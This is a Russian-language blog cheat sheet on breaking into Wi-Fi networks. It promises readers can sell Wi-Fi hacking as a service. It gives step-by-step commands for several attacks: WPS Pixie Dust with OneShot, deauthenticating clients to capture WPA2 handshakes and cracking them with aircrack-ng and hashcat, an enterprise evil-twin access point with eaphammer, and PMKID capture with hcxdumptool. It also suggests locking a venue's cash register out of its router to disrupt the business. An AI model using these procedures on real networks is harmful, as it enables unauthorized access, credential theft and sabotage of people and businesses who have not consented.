July 16, 2023

Шатаем WI-FI (карманная шпора)

После прочтения статьи вы сможете полноценно предоставлять услуги по взлому wi-fi.

Оглавление:

  1. Установка и настройка Alfa AWUS036ACH на Kali Linux
  2. WIFI ATTACKS
    1. Теория
    2. Практика

Install Drivers (УСТАНОВКА ДРОВ НА КАЛИ)

Установка и настройка Alfa AWUS036ACH на Kali Linux

Если загуглить «Лучший адаптер Wi-Fi для Kali Linux», то во всех статьях в пятерку лучших будет входить адаптер Alfa AWUS036ACH. Он поддерживает режим монитора и умеет инжектировать пакеты. Проблема лишь в том, что при подключении, Kali Linux не видит WiFi-адаптер. Далее покажу как решить эту проблему, установив и настроив драйвер Realtek для адаптера Alfa AWUS036ACH на Kali Linux.

Еще по теме: Лучшие способы взлома WiFi

Установка и настройка Alfa AWUS036ACH на Kali Linux

Подключите адаптер к компьютеру с Kali Linux через доступный USB-порт с помощью прилагаемого кабеля.

Если ввести команду lusb, вы увидите, что Kali видит физическое USB-устройство на шине 002.

$ lsusb

Kali Linux не видит Alfa AWUS036ACH

Но вот выполнение команды iwconfig, показывает, что Kali не распознает его, как доступное сетевое устройство. Kali не видит его как устройство, которое может использовать, потому что драйверы еще не установлены.

Следующие несколько шагов исправят этот непорядок.

Обновление Kali Linux

Как всегда, перед установкой драйверов нужно убедиться, что используется обновленная версия Kali Linux.

$ sudo apt-get update

$ sudo apt-upgrade -y

$ sudo apt dist-upgrade -y

После завершения обновления перезагрузите систему.

Установка драйвера Realtek-rtl88xxau на Kali Linux

Установите драйвер Realtek:

$ sudo apt-get install realtek-rtl88xxau-dkms

Поддержка модулей динамического ядра (DKMS) упрощает процесс установки обновлений драйверов.

Установите dkms:

$ sudo apt-get install dkms

Установив dkms, можно приступить к клонированию драйвера rtl8812au с GitHub:

$ git clone <https://github.com/aircrack-ng/rtl8812au>

После скачивания драйвера rtl8812 с GitHub, перейдите в созданный каталог:

$ cd rtl8812au

В этом каталоге выполните следующую команду, для компиляции всех файлов rtl8812 в двоичное приложение:

$ make

Команда make install берет только что созданные двоичные файлы и копирует их в соответствующее место в файловой системе. Убедитесь, что запускаете ее с правами доступа root:

$ sudo make install

Перезагрузите компьютер.

После перезагрузки системы вы можете подтвердить установку драйверов rtl8812au с помощью команды iwconfig. Теперь есть два беспроводных интерфейса, wlan0 и wlan1 — интерфейс Realtek, который мы установили.

Теперь в списке доступных интерфейсов, вы увидите Wi-Fi Networks (REALTEK RTL8812AU 802.11A/B/G/N/AC 2T2R).

Режим монитора Alfa AWUS036ACH на Kali Linux

Чтобы заставить адаптер Alfa AWUS036ACH работать в режиме монитора, откройте терминал Kali Linux и выполните команды:

$ sudo ip link set wlan1 down

$ sudo iw dev wlan1 set type monitor

$ sudo ip link set wlan1 up

Это надо будет делать каждый раз, когда захотите использовать адаптер Alfa AWUS036ACH в режиме монитора. Если возникнут проблемы с переводом адаптера в режим монитора, тогда вам сюда «Как перевести адаптер в режим монитора».

На этом все. Надеюсь статья была полезна.

ПОЛЕЗНЫЕ ССЫЛКИ:

WIFI ATTACKS - ТЕОРИЯ:

Использование SSID и паролей по умолчанию

Точки доступа WIFi поставляются с SSID и паролем по умолчанию, которые необходимо изменить, но слишком часто эти пароли по умолчанию остаются на месте.

Это позволяет злоумышленнику легко войти в систему и получить контроль над маршрутизатором, изменить настройки или прошивку, загрузить вредоносные сценарии или даже изменить DNS-сервер так, чтобы весь трафик направлялся на IP-адрес, принадлежащий злоумышленнику.

  • Пароли по умолчанию должны быть изменены, чтобы никто в радиусе действия сигнала не смог подключиться и прослушивать трафик.
  • Если беспроводные контроллеры используются для управления точками доступа WiFi через веб-интерфейсы, убедитесь, что пароли по умолчанию также изменены. Эти пароли по умолчанию можно легко найти в Интернете и использовать для атак на беспроводные сети.

Размещение точки доступа в местах возможного несанкционированного доступа

Если точка доступа размещена в месте, где к ней можно получить физический доступ, это может привести к несанкционированному вмешательству. Чтобы вернуть точку доступа к заводским настройкам по умолчанию, требуется всего несколько секунд.

  • Убедитесь, что точка доступа размещена в безопасном месте, например, в закрытом шкафу.

Включенная служба WPS

Если на точке доступа включен Wi-Fi Protected Setup, то с большой вероятностью она вскрывается перебором известных пинов или более изящной атакой PixieDust.Список пинов для перебора берется из дефолтных конфигов производителя, который определяется по MAC-адресу. Делать исчерпывающий перебор всех вариантов (брутфорс) чаще всего бессмысленно, так как после N неудачных попыток авторизации по WPS роутер надолго блокирует дальнейшие.

  • Отключайте WPS когда в нем нет необходимости

Использование уязвимого протокола WEP

Протокол Wired Equivalent Privacy (WEP) был первым протоколом, используемым для шифрования беспроводного трафика. WEP, как следует из названия, был призван сделать беспроводные сети такими же безопасными, как и их проводные аналоги, но это не делает беспроводные сети WEP безопасными.

WEP основан на шифре RC4, который сам по себе является безопасным. Но проблема заключается в том, каким образом RC4 реализован в WEP.

WEP позволяет повторно использовать вектор инициализации, а повторное использование ключей никогда не является хорошей идеей. Это позволяет злоумышленнику легко взломать шифрование.

В WEP было обнаружено еще несколько уязвимостей, что делает его далеко не безопасным.

Несмотря на то, что WEP обесценился и существует множество более безопасных протоколов шифрования беспроводных сетей, некоторые компании продолжают использовать WEP, ошибочно полагая, что он безопасен.

WEP более безопасен, чем отсутствие шифрования вообще - плохая безопасность лучше, чем отсутствие безопасности - но существует множество более надежных вариантов шифрования трафика WiFi.

  • Если вы хотите повысить безопасность и предотвратить атаки на WLAN, перейдите на WPA2 или WPA3, которые используют гораздо более безопасный стандарт расширенного шифрования (AES) и лишены уязвимостей WEP.

Уязвимость WPA2

Было актуально в 2019

https://xakep.ru/2019/12/11/krack/

WPA может быть более безопасным, чем WEP, но и он не лишен уязвимостей в беспроводной сети. Два бельгийских исследователя - Мати Ванхоеф и Франк Писсенс из Университета Левена - обнаружили серьезный недостаток в протоколе безопасности WPA. Этот недостаток получил название KRACK, сокращенно от Key Reinstallation Attack. Этот недостаток может быть использован в атаке “человек посередине” для кражи конфиденциальных данных, передаваемых через зашифрованное WPA соединение WiFi. При использовании уязвимости WPAзлоумышленник может подслушать трафик и получить банковские реквизиты, пароли и информацию о кредитных картах.

Уязвимость существует в четырехстороннем рукопожатии. Шифрованное соединение WPA2 начинается с четырехстороннего рукопожатия, но не все части этого рукопожатия являются обязательными. Чтобы ускорить повторное подключение, третья часть передается повторно. Эта третья часть рукопожатия может повторяться несколько раз, и именно этот шаг может быть использован при атаке на беспроводную сеть.

Многократно сбрасывая пароль, передаваемый на третьем этапе рукопожатия, злоумышленник может постепенно сопоставить зашифрованные пакеты и обнаружить полную связку ключей, используемую для шифрования трафика.

Угрожающий агент может создать клон точки доступа WiFi, к которой пользователь подключался ранее, - злого двойника. Для пользователя в этом не будет ничего страшного, так как доступ в Интернет будет предоставляться через этого “злого двойника”. Злоумышленник может заставить пользователя подключиться к клонированной сети WiFi и перехватить всю информацию, отправленную через эту сеть WiFi. Хотя атака не будет работать на сайтах с SSL/TLS шифрованием, можно использовать инструменты, которые делают это возможным, заставляя пользователя посетить HTTP версию сайта.

Чтобы осуществить атаку KRACK WiFi, сеть WiFi должна использовать WPA2-PSK или WPA-Enterprise, а атакующий должен находиться в зоне действия сигнала WiFi.

  • Лучшим средством защиты является обновление маршрутизаторов.
  • Проблема была решена в WPA3, который поддерживается новыми беспроводными точками доступа.

Даже с учетом этой исключительно распространенной уязвимости беспроводных сетей, WPA2 по-прежнему гораздо более безопасен, чем WEP.

NetSpectre - удаленная уязвимость Spectre

Было актуально в 2018

https://xakep.ru/2018/07/30/netspectre/

Spectre - это уязвимость, которая затрагивает микропроцессоры, выполняющие предсказание ветвлений. Уязвимость может быть использована, чтобы позволить злоумышленнику получить доступ к выбранным местам виртуальной памяти и, таким образом, получить конфиденциальные данные. Для того чтобы воспользоваться уязвимостью, злоумышленнику необходимо убедить пользователя загрузить и запустить вредоносный код или посетить веб-сайт, на котором в браузере запущен JavaScript. Исследователи из Технологического университета Граца разработали новый тип атаки, которая может быть осуществлена через сетевые соединения, включая сети WiFi. Атака - названная NetSpectre - к счастью, сложна, поэтому существуют гораздо более простые способы атаковать организацию. Поэтому риск ее использования невелик.


Атаки на дефолтные пароли и мисконфиги роутеров

С каждым годом растет количество и добавляются виды устройств в сети

становиться видно больше устройств, которые не настраивались вообще:
  • веб-камеры
  • файловые сервера
  • телевизоры с Wi-Fi
  • всякие прочие IoT штучки
  • и роутеры доже

Множество устройств с учётными данными admin: admin видны для сканеров

По итогу можно выполнить достаточно большой импакт.

Например, представим себе что вы взломали wi-fi точку отеля, кальянной и т.п.

Теперь вы видите и можете просканировать подсети. Как только это произойдет, вы наткнетесь на ПК администратора/кассира, кассовый аппарат, камеры периметра и т.п.

Это очень круто, но можно просто изменить настройки роутера и добавить кассовый аппарат в список запрещенных устройств, тем самым выбить из работы заведение до приезда мастера. Даже банальная смена пароля вызовет ошибки в работе у подключенных устройств.


Атаки на уязвимости специфических сервисов и функции роутеров

Что атакуем:

  1. Уязвимые девайсы/прошивки, операционки роутеров
  2. Уязвимые второстепенные службы

Роутеры, кроме своих обычных функций, могут быть файловыми серверами, веб-серверами, торрент-клиентами и т. д.

Wardriving

Wardriving - это техника, используемая для выявления и нанесения на карту уязвимых точек доступа. Название происходит от того, что злоумышленники ездят по району и используют ноутбук с GPS-устройством, антенну для определения и записи местоположения беспроводных сетей. Эта техника эффективна, поскольку многие сети WiFi, используемые предприятиями, выходят за пределы здания, а для защиты этих сетей применяются слабые средства контроля безопасности.


Warshipping

Варшипинг - это более эффективный метод атаки на сети WiFi, поскольку он позволяет проводить атаки удаленно, даже если атакующий не находится в радиусе действия сети WiFi. Эту тактику объяснили исследователи IBM X-Force Red на Black Hat USA. Они использовали дешевые (менее 100 долларов) и легкодоступные компоненты для создания одноплатного компьютера с возможностями WiFi и 3G, который работает от батареи сотового телефона. Устройство может использоваться для локального подключения к сети WiFi и отправки информации злоумышленникам через сотовую связь 3G.

Поскольку устройство небольшое, его можно легко спрятать в небольшом пакете, а доставить этот пакет в здание очень просто. Его можно просто отправить по почте. Поскольку посылка может быть адресована кому-то, кто не работает в компании, она может пролежать в почтовом отделении некоторое время, прежде чем ее вскроют. Поскольку посылку можно отследить, злоумышленники будут знать, когда она окажется в здании. Кроме того, устройство может быть спрятано в любом количестве предметов - от цветочных горшков до плюшевых медведей. Если устройство находится в зоне действия сетей WiFi, его можно использовать для атаки на эти сети.

Хешированные коды доступа к сети могут быть отправлены обратно злоумышленникам для взлома, после чего устройство может подключиться к сетям WiFi в здании и собирать данные. Устройство может быть использовано в атаке “человек посередине”, выдавая себя за внутреннюю сеть WiFi.

WIFI ATTACKS - ПРАКТИКА:

АТАКА Pixie Dust

(+) Взлом требует несколько секунд.

(-) Все стали выключать WPS, мало точек.

В конце 2014 года специалист по компьютерной безопасности Доминик Бонгард (Dominique Bongard) нашел уязвимость в WPS, которая позволила взломать Wi-Fi роутер за несколько минут.

Проблема была в генерации случайных чисел (E-S1 и E-S2) на многих роутерах. Если мы узнаем эти числа — мы сможем легко узнать WPS pin, так как именно они используются в криптографической функции для защиты от брутфорса по получению WPS pin.

Роутер отдает хэш, сгенерированный с использованием WPS pin и данных (E-S1 и E-S2) чисел, что бы доказать, что он его так же знает (это сделано для защиты от подключения к фейковой точке, которая могла бы просто принять ваш пароль и слушать трафик).

E-S1 и E-S2 используются в генерации E-Hash1, E-Hash2, которые в свою очередь получим от роутера в сообщении M3.


Протокол WPS

Важными здесь являются: M1, M2, M3.

Сообщение M1 — роутер отправляет клиенту N1, Description, PKE.

Сообщение M2 — клиент отправляет роутеру N1, N2, PKR, Auth.

Auth — хэш от первого и второго сообщений.

И самое важное

Cообщение M3 — роутер отправляет клиенту E-Hash1, E-Hash2.

E-Hash1 = HMAC-SHA-256(authkey) (E-S1 | PSK1 | PKE | PKR)

E-Hash2 = HMAC-SHA-256(authkey) (E-S2 | PSK2 | PKE | PKR)

Где PSK1 — первые 4 цифры WPS pin, PSK2 — остальные 4 цифры.

E-S1 и E-S2 — должны быть случайными 128-битными числами.

PKE — публичный ключ роутера.

PKR — публичный ключ клиента.

Из этого получается что неизвестными являются (пока еще) E-S1 и E-S2, PSK1 и PSK2.

M4 — клиент отправляет R-Hash1, R-Hash2 для подтверждения того, что он так же знает WPS pin.

Если все ок — роутер отдаст клиенту парольную фразу для доступа к сети, привязанную к текущему WPS pin. Это сделано из расчета, что WPS pin не должен быть постоянным, и в случае его изменения — клиент должен заново получить пароль.


Генерация E-S1 и E-S2 на наших роутерах:

В “Broadcom/eCos” эти 2 числа генерируются сразу после генерации N1 (публичный ключ) той же функцией. Получение E-S1 и E-S2 сводится к брутфорсу состояния функции на основании N1 и получения в результате E-S1 и E-S2.

Код функции:

#if (defined(__ECOS) || defined(TARGETOS_nucleus))
void
generic_random(uint8 * random, int len)
{
	int tlen = len;
	while (tlen--) {
		*random = (uint8)rand();
		*random++;
	}
	return;
}
#endif

Исходник — github.com/RMerl/asuswrt-merlin/blob/master/release/src-rt/bcmcrypto/random.c

В “Realtek” для генерации таких чисел функция использует UNIX timestamp.

Аналогично Broadcom, N1 и E-S1,2 генерирует одна функция.

И если весь обмен происходит в ту же секунду, E-S1 = E-S2 = N1.

Если в течение нескольких секунд — брутфорс состояния на основе N1.

Исходник — github.com/skristiansson/uClibc-or1k/blob/master/libc/stdlib/random_r.c

В “Ralink” E-S1 и E-S2 никогда не генерятся. Они всегда равны 0.

E-S1 = E-S2 = 0

В “MediaTek” и “Celeno” такая же картина:

E-S1 = E-S2 = 0


Summary

Предположим мы уже знаем PKE, PKR, Authkey, E-Hash1 и E-Hash2 — все эти данные мы получили в результате общения с роутером (см. Выше M1, M2, M3). E-S1 и E-S2 сбрутили либо знаем что он = 0.

Дело осталось за малым — отправляем все данные в хэш функцию и сравниваем каждый новый pin с (E-Hash1 и E-Hash2). В результате за несколько минут мы получим WPS pin и, собственно, доступ к сети.

Воспроизведение

Если на маршрутизаторе только одна кнопка (она может называться «WLAN/WPS», «WiFi/WPS») — для включения или отключения раздачи Wi-Fi нужно держать ее нажатой не менее трех секунд. Нажимая кнопку коротким быстрым нажатием, вы активируете функцию WPS.

Шаг 1. Запускаем Kali Linux и обновляем список пакетов введя в терминале apt update.

apt update

Шаг 2. Копируем с гитхаба скрипт OneShot. Для демонстрации я выбрал именно его по двум причинам. Во-первых, потому что человек специализирующийся на аудите посоветовал именно OneShot, а во-вторых, только она поддерживает атаку без перевода сетевой карты в режим монитора. Да и к тому же в данный срипт уже встроен сканер, показывающий только активные сети с включённым WPS’ом, а значит, теоретически уязвимым.

git clone https://github.com/drygdryg/OneShot

Шаг 3. Заходим в каталог с прогой.

cd OneShot

Шаг 4. И запускаем сканирование. Практически сразу появится список из сетей, обнаруженных в зоне видимости. Точки, которые 100% небезопасны, данная прога помечает зелёным. Остальные же – надо тестить. Вводим номер.

sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

 Зеленым цветом утилита подсветит уязвимые точки и предложит ввести номер атакуемой:

Шаг 5. Вводим номер атакуемой точки и ждём окончания процедуры проверки.

По итогу получаем пароль:

На самом деле, далеко не все устройства сегодня имеют подобную уязвимость. Если быть точнее, их процентов 5. Ну край 10. И то, только потому что в большинстве своём админы на предприятиях РФ не особо заморачиваются с безопасностью. Крайне редко обновляет прошивки, а уж о покупке новых маршрутизаторов задумываются только когда сгорает старый.

АТАКА WPA2-PSK

В WPA2-PSK аутентификация осуществляется по паролю (Pre-Shared Key). Клиент при подключении указывает пароль, передает точке, та аутентифицирует пользователя.

Для следующих атак необходимо перевести сетевую карту в режим монитора Узнаем имя интерфейса: sudo iw dev или iwconfig Останавливаем мешающие службы: sudo systemctl stop NetworkManager

sudo systemctl stop networking

sudo airmon-ng check kill Переводим в режим монитора: sudo airmon-ng start wlan0 Проверяем успешностьsudo iw dev

Handshake capture

Смысл атаки в том, что клиент при подключении к сети, в ходе 4-х стороннего рукопожатия, передает хэш пароля от данной сети. Задача - перехватить данное рукопожатие. Для этого можно просто сидеть и сниффать весь трафик, а можно принудительно отключить уже подключенных клиентов. Так или иначе, нам требуются клиенты целевой сети, т.к. атака направлена в первую очередь на них.

Похек скрытой сети происходит ровно так же: при подключении клиент передает имя сети, к которой подключается. airodump это прекрасно восстанавливает на лету.

Поиск сетей

Для начала надо определиться, какие сети мы видим и че будем хекать. Сначала стоит поискать по всем каналам

sudo airodump-ng wlan0mon

Поиск цели

sudo airodump-ng –bssid [MAC адрес точки доступа] –channel [номер канала] -w wifi wlan0

Деаутентификация клиентов

Лучше делать во втором окне (в первом у нас пашет airodump С флагом на запись!)

Количество пакетов: 0 - для бесконечного; Без указания клиента, будут бродкаст пакеты (как показала практика, не очень это эффективно)

sudo aireplay-ng –deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0

В случае перехвата хэндшейка, в airodump'e сверху в строке состояния появится надпить WPA handshake: MAC. Примерно так:

CH 1 ][ Elapsed: 48 s ][ 2022-11-11 13:37 ][ WPA handshake: 01:02:03:04:05:06

Чистим полученный хендшейк

wpaclean ИмяНовогоФайла ИмяСтарогоФайла

Теперь можем взломать пароль:

sudo aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]

Дамп хэндшейков из .cap файла

После того, как перехватили хэндшейк, его надо вытащить из .cap файла. Делается командой

aircrack-ng [CAP_FILE] -j [OUT_FILE]

Флаг -j перегоняет в формат, поддерживаемый хэшкатом

Брут

Собираем все сдампленные хэндшейки в один файл:

cat *.hccapx > merge.hccapx

Отправляем на сервер и ставим брутить:

hashcat -m 22000 -a 0 [HCCAPX_FILE] [WORDLIST] -o [OUT_FILE] -r [RULE_FILE] --session [SESSION_NAME]

Восстанавливаем работу сети

Перезапуск NetworkManager:

sudo airmon-ng stop wlan0mon

NetworkManager

АТАКА WPA2-MGT

Пока тыкали airodump, могли заметить подобные сетки:

6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfWifi

И имя этой штуке - энтерпрайз. Отличие от PSK-сетки - клиента аутентифицирует не роутер, а RADIUS-сервер. Есть различные варианты реализации такой сети. Основные отличия - в типах EAP. Основной способ атаки - поднятие поддельной точки доступа (Evil-Twin). Создаем точку с таким же SSID, как у легитимной сети, и если клиент не проверяет, куда он подключается, мы получим его креды.

Подсказка: ловить клиентов стоит в местах, где сигнал от легитимной точки минимален или отсутствует. Так выше шанс, что клиенты будут приходить аутентифицироваться на нашей точке.

Создаем поддельный серт:

Проверяем на каком интерфейсе у нас работает альфа:

ip a

Видно что wlan1 - это интерфейс, который подлючен к точке доступа для выхода в интернет (это видно по тому, что был определен ip адрес)

Включаем мониторинг сети:

sudo airmon-ng start wlan0

sudo airodump-ng wlan0

Поднимаем поддельную точку. Указываем интерфейс, канал, имя сети, путь до созданного серта:

sudo python eaphammer --bssid F8:0B:CB:D7:5B:EF --essid infosec --channel 1 --wpa-version 2 --auth wpa-eap --interface wlan0 --creds --hw-mode a --server-cert /home/administrator/tools/eaphammer/certs/ca/[email protected]

Важной деталью является тот момент, что я изменил канал на 1 в отличии от легитимной точки, и указал мод для 5 ГГц.

Полезные флаги:

--hw-mode (n/a) - n для 2,4 ГГц, a для 5 ГГц --negotiate - EAP downgrade

Ждем подлючения:

Потом нужно расбрутать данные:

Но перед этим необходимо установить старую версию ПО и поставить необходимые библиотеки:

  1. https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libxcrypt-dev_2.4-4_amd64.deb.html
  2. https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libxcrypt1_2.4-4_amd64.deb.html
  3. sudo dpkg -i '/home/administrator/Downloads/libxcrypt-dev_2.4-4_amd64.deb'
  4. sudo dpkg -i '/home/administrator/Downloads/libxcrypt-dev_2.4-4_amd64.deb'

Сборка утилиты:

$ git clone <https://github.com/joswr1ght/asleap> $ cd asleap $ make $ ./asleap -V

asleap –C <challenge> -R <response> -W <wordlist

asleap –C 9b:ef:81:76:5f:cb:c7:a6 -R

./asleap -C c1:5d:c7:2a:17:f9:61:c6 -R fa:bc:26:d9:93:b8:f2:15:7a:dd:c8:49:dc:bd:56:67:70:71:c5:a1:06:42:60:d6 -W /usr/share/wordlists/rockyou.txt

Брут с помощью хэшката:

hashcat e_zaytsev::::590bd7b3c2b1e0349a7fee61b92cd34bb6302fd9cb703f34:b282798407b51e04 /usr/share/wordlists/rockyou.txt

Атака не будет работать, если:

  • Аутентификация происходит по серту (EAP-TLS, PEAPv0(EAP-TLS)), т.к. нечего перехватывать
  • Осуществляется валидация сертификата сервера во время первой фазы аутентификации

Увидели такие ошибки в логах? Можно идти курить. Атака не сработает.

АТАКА PMKID

Эта атака была открыта случайно во время поиска новых способов атаковать будущий стандарт безопасности WPA3. Этот WPA3 будет атаковать намного труднее из-за современного протокола установления ключей, называемого "Simultaneous Authentication of Equals" (SAE).

В чем же плюсы такой атаки ? А в том что больше не нужно ждать "соседей" пока они придут домой и подключаться к своему WIFI, что бы отключить их и поймать Рукопожатие - Handshake.

В процессе дампа информации от AP, мы сможем найти хеш даже в WireShark :

Переведем нашу карту в режим монитора

airmon-ng start *wlan1*

Имя вашего адаптера вы можете узнать прописав команду

airmon-ng

после того как перевели в режим монитора, воспользуемся утилитой

hcxdumptool
hcxdumptool -o all-wifi.pcapng -i wlan1mon --enable_status 15

И расскажу не много хитрости которую не рассказал в видео ролике, пускай это будет некоторой эксклюзивностью если можно так сказать

Мы можем направить атаку не на все точки доступа сразу, а точечно, выбрать мак адрес и записывать в файл информацию только о нем, для этого

откроем

airodump-ng -i wlan1mon

Найдем нужный нам SSID, скопируйте его MAC адрес и выполните следующую команду

echo "XXXXXXXXXXXX" > filterlist.txt
  • Давайте поясню для тех кто не понимает что это. Мы записали мак адрес в файл filterlist.txt

Но самое интересное то что утилита

hxcdumptool

принимает МАК адресс без разделителя

data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7

).

И теперь если мы хотим атаковать определенную AP пишем

hcxdumptool -o all-wifi.pcapng -i wlan1mon --enable_status 15 --filterlist_ap=filterlist.txt --filtermode=2

Или соберем все:

sudo hcxdumptool -o all-wifi.pcapng -i wlan0 --enable_status 15 -t 5

Оставляем на 30 минут

Теперь нам понадобиться утилита

hcxpcaptool

Набираем

hcxpcaptool -z all-wifi.16800 all-wifi.pcapng

Хочу отметить что тут нужно сначала указывать имя выходного файла "all-wifi.16800", где 16800 напоминалка о режиме hashcat, но об этом не много позже, а all-wifi.pcapng это наш сборник информации из которого мы извлекаем PMKID для брут форса.

После успешного сбора

После того как мы в логах увидели уведомление напротив пакета

PMK FOUND

Останавливаем процесс и двигаемся дальше.

HASHCAT

Теперь за дело берется наш кот, кормим его не вискасом,а нашим хешем =)

hashcat -a 0  all-wifi.16800 /usr/share/wordlists/rockyou.txt

И запускаем и ждем результатов

Тут уже будет зависеть от ваших словарей, либо фантазии по маске в hashcat.

https://www.youtube.com/watch?v=DABSuU5NUwM&t=10s

Еще больше интересных статей в моем ТГ канале: https://t.me/pro_pentest